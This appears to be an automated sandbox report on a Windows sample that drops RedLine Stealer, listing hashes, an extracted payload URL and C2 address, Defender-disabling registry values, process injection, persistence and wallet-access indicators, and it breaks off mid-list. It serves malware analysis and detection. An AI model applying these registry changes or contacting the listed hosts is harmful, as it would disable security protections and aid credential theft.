Analysis
-
max time kernel
151s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
09-06-2022 20:12
Static task
static1
Behavioral task
behavioral1
Sample
aad0024d7c30bf6fee7c90d90371ca14.exe
Resource
win7-20220414-en
General
-
Target
aad0024d7c30bf6fee7c90d90371ca14.exe
-
Size
37.0MB
-
MD5
aad0024d7c30bf6fee7c90d90371ca14
-
SHA1
a503d2586a3eab062b1696fc1602bae9faaeb221
-
SHA256
69a22a0c352f37433ae833dcffed41e1b6d6c5aeefe6167aa4e0be3fe2f07e07
-
SHA512
b8aa5a82c7b3366bc93dee6bfffbb6d5e6fefeff12d8073f8a86993e0a4c985fd88dd33ef87b89384cd094dc34444fc505bfcb3b90cc647bd01088692c3f970a
Malware Config
Extracted
http://thddghdd3.com/hfile.bin
Extracted
redline
Main
185.250.148.104:23290
-
auth_value
128a196090d81c16477a2ef82c42859f
Signatures
-
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
Processes:
reg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications reg.exe -
Modifies security service 2 TTPs 4 IoCs
Processes:
reg.exereg.exereg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" reg.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4976-319-0x0000000000B80000-0x0000000000BA0000-memory.dmp family_redline -
Suspicious use of NtCreateUserProcessOtherParentProcess 32 IoCs
Processes:
svchost.exedescription pid process target process PID 4176 created 2608 4176 svchost.exe kernel32.exe PID 4176 created 4568 4176 svchost.exe kernel32.exe PID 4176 created 832 4176 svchost.exe kernel32.exe PID 4176 created 3496 4176 svchost.exe kernel32.exe PID 4176 created 3652 4176 svchost.exe kernel32.exe PID 4176 created 1256 4176 svchost.exe kernel32.exe PID 4176 created 5112 4176 svchost.exe kernel32.exe PID 4176 created 1312 4176 svchost.exe kernel32.exe PID 4176 created 4740 4176 svchost.exe kernel32.exe PID 4176 created 5020 4176 svchost.exe DllHost.exe PID 4176 created 4480 4176 svchost.exe kernel32.exe PID 4176 created 3476 4176 svchost.exe kernel32.exe PID 4176 created 3604 4176 svchost.exe kernel32.exe PID 4176 created 2044 4176 svchost.exe kernel32.exe PID 4176 created 2088 4176 svchost.exe kernel32.exe PID 4176 created 3372 4176 svchost.exe kernel32.exe PID 4176 created 4704 4176 svchost.exe kernel32.exe PID 4176 created 4572 4176 svchost.exe kernel32.exe PID 4176 created 832 4176 svchost.exe kernel32.exe PID 4176 created 4160 4176 svchost.exe kernel32.exe PID 4176 created 1144 4176 svchost.exe kernel32.exe PID 4176 created 892 4176 svchost.exe kernel32.exe PID 4176 created 3980 4176 svchost.exe kernel32.exe PID 4176 created 3096 4176 svchost.exe kernel32.exe PID 4176 created 2628 4176 svchost.exe kernel32.exe PID 4176 created 2564 4176 svchost.exe kernel32.exe PID 4176 created 228 4176 svchost.exe kernel32.exe PID 4176 created 2620 4176 svchost.exe kernel32.exe PID 4176 created 2036 4176 svchost.exe kernel32.exe PID 4176 created 1708 4176 svchost.exe kernel32.exe PID 4176 created 4348 4176 svchost.exe kernel32.exe PID 4176 created 3196 4176 svchost.exe kernel32.exe -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 16 3772 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
Processes:
aad0024d7c30bf6fee7c90d90371ca14.tmp7za.exeWise Care 365 5.9.1.582.exekernel32.exeWise Care 365 5.9.1.582.tmpkernel32.exekernel32.exeConhost.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exePING.EXEkernel32.exekernel32.exekernel32.exeDllHost.exekernel32.exekernel32.exekernel32.exekernel32.exereg.exekernel32.exekernel32.exereg.exekernel32.exekernel32.exekernel32.exekernel32.exeConhost.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exePING.EXEkernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exePING.EXEkernel32.exekernel32.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exeielowutil.execmpbksrvc32.exepid process 2944 aad0024d7c30bf6fee7c90d90371ca14.tmp 320 7za.exe 3436 Wise Care 365 5.9.1.582.exe 2608 kernel32.exe 4780 Wise Care 365 5.9.1.582.tmp 4568 kernel32.exe 832 kernel32.exe 4864 Conhost.exe 3496 kernel32.exe 3652 kernel32.exe 3548 kernel32.exe 1256 kernel32.exe 5112 kernel32.exe 3992 PING.EXE 1312 kernel32.exe 4740 kernel32.exe 2148 kernel32.exe 5020 DllHost.exe 4480 kernel32.exe 3324 kernel32.exe 3476 kernel32.exe 3604 kernel32.exe 1884 reg.exe 2044 kernel32.exe 2088 kernel32.exe 3528 reg.exe 3372 kernel32.exe 4704 kernel32.exe 4272 kernel32.exe 4572 kernel32.exe 832 kernel32.exe 3432 Conhost.exe 4160 kernel32.exe 1144 kernel32.exe 3548 kernel32.exe 892 kernel32.exe 3980 kernel32.exe 3428 kernel32.exe 3096 kernel32.exe 2628 kernel32.exe 2012 PING.EXE 2564 kernel32.exe 228 kernel32.exe 4388 kernel32.exe 2036 kernel32.exe 2620 kernel32.exe 1708 kernel32.exe 2088 kernel32.exe 4348 kernel32.exe 2136 PING.EXE 3196 kernel32.exe 1844 kernel32.exe 2040 7za.exe 644 7za.exe 1728 7za.exe 5116 7za.exe 4876 7za.exe 2596 7za.exe 5040 7za.exe 2100 7za.exe 1480 7za.exe 2128 7za.exe 3980 ielowutil.exe 2476 cmpbksrvc32.exe -
Processes:
resource yara_rule behavioral2/memory/2236-331-0x0000000000BE0000-0x0000000000D35000-memory.dmp upx behavioral2/memory/2236-334-0x0000000000BE0000-0x0000000000D35000-memory.dmp upx behavioral2/memory/2236-336-0x0000000000BE0000-0x0000000000D35000-memory.dmp upx behavioral2/memory/1888-337-0x0000000000BE0000-0x0000000000D35000-memory.dmp upx behavioral2/memory/4368-338-0x0000000000BE0000-0x0000000000D35000-memory.dmp upx behavioral2/memory/1888-339-0x0000000000BE0000-0x0000000000D35000-memory.dmp upx behavioral2/memory/4368-340-0x0000000000BE0000-0x0000000000D35000-memory.dmp upx behavioral2/memory/1888-341-0x0000000000BE0000-0x0000000000D35000-memory.dmp upx -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exeWScript.exenvdrivesllapi.exeaad0024d7c30bf6fee7c90d90371ca14.tmpdescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation nvdrivesllapi.exe Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation aad0024d7c30bf6fee7c90d90371ca14.tmp -
Loads dropped DLL 5 IoCs
Processes:
aad0024d7c30bf6fee7c90d90371ca14.tmpWise Care 365 5.9.1.582.tmppid process 2944 aad0024d7c30bf6fee7c90d90371ca14.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp -
Modifies file permissions 1 TTPs 3 IoCs
Processes:
icacls.exeicacls.exeicacls.exepid process 2620 icacls.exe 2332 icacls.exe 3240 icacls.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
AutoIT Executable 8 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule behavioral2/memory/2236-331-0x0000000000BE0000-0x0000000000D35000-memory.dmp autoit_exe behavioral2/memory/2236-334-0x0000000000BE0000-0x0000000000D35000-memory.dmp autoit_exe behavioral2/memory/2236-336-0x0000000000BE0000-0x0000000000D35000-memory.dmp autoit_exe behavioral2/memory/1888-337-0x0000000000BE0000-0x0000000000D35000-memory.dmp autoit_exe behavioral2/memory/4368-338-0x0000000000BE0000-0x0000000000D35000-memory.dmp autoit_exe behavioral2/memory/1888-339-0x0000000000BE0000-0x0000000000D35000-memory.dmp autoit_exe behavioral2/memory/4368-340-0x0000000000BE0000-0x0000000000D35000-memory.dmp autoit_exe behavioral2/memory/1888-341-0x0000000000BE0000-0x0000000000D35000-memory.dmp autoit_exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
ielowutil.exedescription pid process target process PID 3980 set thread context of 4976 3980 ielowutil.exe csc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 3 IoCs
Processes:
timeout.exetimeout.exetimeout.exepid process 1896 timeout.exe 3036 timeout.exe 456 timeout.exe -
Download via BitsAdmin 1 TTPs 2 IoCs
-
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
xcopy.exexcopy.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
kernel32.exereg.exereg.exePING.EXEkernel32.exePING.EXEkernel32.exekernel32.exekernel32.exekernel32.exeConhost.exePING.EXEkernel32.exekernel32.exeConhost.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" kernel32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PING.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" kernel32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PING.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" kernel32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" kernel32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" Conhost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" PING.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" PING.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" kernel32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" PING.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" PING.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" kernel32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ Conhost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" PING.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" Conhost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" PING.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" Conhost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" PING.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" kernel32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ Conhost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PING.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" PING.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" PING.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" PING.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" kernel32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" PING.EXE -
Modifies registry class 2 IoCs
Processes:
explorer.execmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings cmd.exe -
Runs ping.exe 1 TTPs 64 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEpid process 2616 PING.EXE 4156 PING.EXE 216 PING.EXE 3224 PING.EXE 2676 PING.EXE 4740 PING.EXE 4156 PING.EXE 2464 PING.EXE 3240 PING.EXE 4412 PING.EXE 2608 PING.EXE 3992 PING.EXE 1776 PING.EXE 3936 PING.EXE 4148 PING.EXE 1656 PING.EXE 3088 PING.EXE 2372 PING.EXE 1384 PING.EXE 2568 PING.EXE 5004 PING.EXE 1552 PING.EXE 4952 PING.EXE 2556 PING.EXE 2832 PING.EXE 2136 PING.EXE 5080 PING.EXE 2212 PING.EXE 2980 PING.EXE 1652 PING.EXE 1500 PING.EXE 4876 PING.EXE 2004 PING.EXE 3552 PING.EXE 3708 PING.EXE 3536 PING.EXE 456 PING.EXE 2100 PING.EXE 3992 PING.EXE 876 PING.EXE 2260 PING.EXE 5016 PING.EXE 4944 PING.EXE 4640 PING.EXE 2604 PING.EXE 4204 PING.EXE 2532 PING.EXE 5024 PING.EXE 4208 PING.EXE 3384 PING.EXE 4372 PING.EXE 2832 PING.EXE 4532 PING.EXE 4208 PING.EXE 3384 PING.EXE 4444 PING.EXE 2100 PING.EXE 4260 PING.EXE 2012 PING.EXE 3284 PING.EXE 2332 PING.EXE 644 PING.EXE 4228 PING.EXE 4592 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
aad0024d7c30bf6fee7c90d90371ca14.tmppowershell.exekernel32.exekernel32.exeWise Care 365 5.9.1.582.tmpkernel32.exekernel32.exepid process 2944 aad0024d7c30bf6fee7c90d90371ca14.tmp 2944 aad0024d7c30bf6fee7c90d90371ca14.tmp 3772 powershell.exe 3772 powershell.exe 2608 kernel32.exe 2608 kernel32.exe 2608 kernel32.exe 2608 kernel32.exe 4568 kernel32.exe 4568 kernel32.exe 4568 kernel32.exe 4568 kernel32.exe 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 832 kernel32.exe 832 kernel32.exe 832 kernel32.exe 832 kernel32.exe 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 3496 kernel32.exe 3496 kernel32.exe 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 4780 Wise Care 365 5.9.1.582.tmp 3496 kernel32.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exekernel32.exesvchost.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exeDllHost.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exedescription pid process Token: SeDebugPrivilege 3772 powershell.exe Token: SeDebugPrivilege 2608 kernel32.exe Token: SeAssignPrimaryTokenPrivilege 2608 kernel32.exe Token: SeIncreaseQuotaPrivilege 2608 kernel32.exe Token: 0 2608 kernel32.exe Token: SeTcbPrivilege 4176 svchost.exe Token: SeTcbPrivilege 4176 svchost.exe Token: SeDebugPrivilege 4568 kernel32.exe Token: SeAssignPrimaryTokenPrivilege 4568 kernel32.exe Token: SeIncreaseQuotaPrivilege 4568 kernel32.exe Token: SeDebugPrivilege 832 kernel32.exe Token: SeAssignPrimaryTokenPrivilege 832 kernel32.exe Token: SeIncreaseQuotaPrivilege 832 kernel32.exe Token: 0 832 kernel32.exe Token: SeDebugPrivilege 3496 kernel32.exe Token: SeAssignPrimaryTokenPrivilege 3496 kernel32.exe Token: SeIncreaseQuotaPrivilege 3496 kernel32.exe Token: SeDebugPrivilege 3652 kernel32.exe Token: SeAssignPrimaryTokenPrivilege 3652 kernel32.exe Token: SeIncreaseQuotaPrivilege 3652 kernel32.exe Token: 0 3652 kernel32.exe Token: SeDebugPrivilege 1256 kernel32.exe Token: SeAssignPrimaryTokenPrivilege 1256 kernel32.exe Token: SeIncreaseQuotaPrivilege 1256 kernel32.exe Token: SeDebugPrivilege 5112 kernel32.exe Token: SeAssignPrimaryTokenPrivilege 5112 kernel32.exe Token: SeIncreaseQuotaPrivilege 5112 kernel32.exe Token: 0 5112 kernel32.exe Token: SeDebugPrivilege 1312 kernel32.exe Token: SeAssignPrimaryTokenPrivilege 1312 kernel32.exe Token: SeIncreaseQuotaPrivilege 1312 kernel32.exe Token: SeDebugPrivilege 4740 kernel32.exe Token: SeAssignPrimaryTokenPrivilege 4740 kernel32.exe Token: SeIncreaseQuotaPrivilege 4740 kernel32.exe Token: 0 4740 kernel32.exe Token: SeDebugPrivilege 5020 DllHost.exe Token: SeAssignPrimaryTokenPrivilege 5020 DllHost.exe Token: SeIncreaseQuotaPrivilege 5020 DllHost.exe Token: SeDebugPrivilege 4480 kernel32.exe Token: SeAssignPrimaryTokenPrivilege 4480 kernel32.exe Token: SeIncreaseQuotaPrivilege 4480 kernel32.exe Token: 0 4480 kernel32.exe Token: 